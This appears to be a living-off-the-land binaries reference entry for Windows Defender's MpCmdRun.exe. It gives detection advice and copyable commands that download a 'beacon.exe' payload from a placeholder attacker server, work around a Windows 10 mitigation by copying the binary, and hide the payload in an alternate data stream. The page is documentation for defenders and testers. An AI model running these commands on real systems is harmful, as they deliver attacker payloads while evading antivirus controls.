.. / MpCmdRun.exe
Star

Binary part of Windows Defender. Used to manage settings in Windows Defender


Paths:


Resources:
https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
https://twitter.com/mohammadaskar2/status/1301263551638761477
https://twitter.com/Oddvarmoe/status/1301444858910052352
https://twitter.com/NotMedic/status/1301506813242867720

Acknowledgement:
Askar - @mohammadaskar2
Oddvar Moe - @oddvarmoe
RichRumble -
Cedric - @th3c3dr1c


Detection:
MpCmdRun storing data into alternate data streams.
MpCmdRun getting a file from a remote machine or the internet that is not expected.
Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
User Agent is "MpCommunication"



Download

Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Usecase:Download file
Privileges required:User
OS:Windows 10
Mitre:T1105



Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
Usecase:Download file
Privileges required:User
OS:Windows 10
Mitre:T1105



Alternate data streams

Download file to machine and store it in Alternate Data Stream
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
Usecase:Hide downloaded data inton an Alternate Data Stream
Privileges required:User
OS:Windows 10
Mitre:T1096